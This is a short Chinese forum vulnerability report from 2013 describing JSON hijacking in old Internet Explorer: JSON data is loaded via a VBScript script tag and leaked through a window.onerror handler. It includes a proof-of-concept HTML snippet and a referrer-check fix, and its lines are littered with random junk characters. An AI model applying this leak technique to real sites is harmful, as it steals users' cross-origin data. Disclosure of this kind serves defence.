简要描述:
. N! }2 H) A& W; I3 j# _ x) b0 [( w# @
由于某些资源容器对数据处理不当导致json劫持漏洞. L1 |" O% ?$ p1 S/ F
详细说明:- \5 G/ _3 l; E
由于ie支持vbscript,所以script元素可以指定成vbscript语言:+ W7 E" p# O. \4 H. ] z
<script language=vbscript></script>6 c8 d/ a- s. b5 ]) B
3 m* b) x. h1 J& R6 G# L7 P( R. W$ D! Z/ T
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
/ V6 Y k8 u8 I/ E" v Z0 {; F漏洞证明: v4 y- q# L$ T3 F3 i( o p
<script>4 O' s1 c0 q. Z4 r
window.onerror=function(_){1 H7 l Z$ g* N; z) c1 y
alert(_)
0 E& i; E/ f. G1 c( C* W; {. P}7 c( \2 x% K, W
</script>
: d1 M+ ?. Z9 Y$ o. E<script language=vbscript src=1.json></script>
. K* d, F: `) q! C
5 Z3 e4 l/ b* i3 g7 `8 Y3 H6 X# F
( Z! u; c) j- y* F) S/ }1.json:
6 S) ~$ u. `0 L% f( L[{"name":"sogili","age":19}]
2 n( L0 m' Z Y0 A: y% z, c修复方案:
. Y6 E4 G4 d0 N, ]$ R A网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对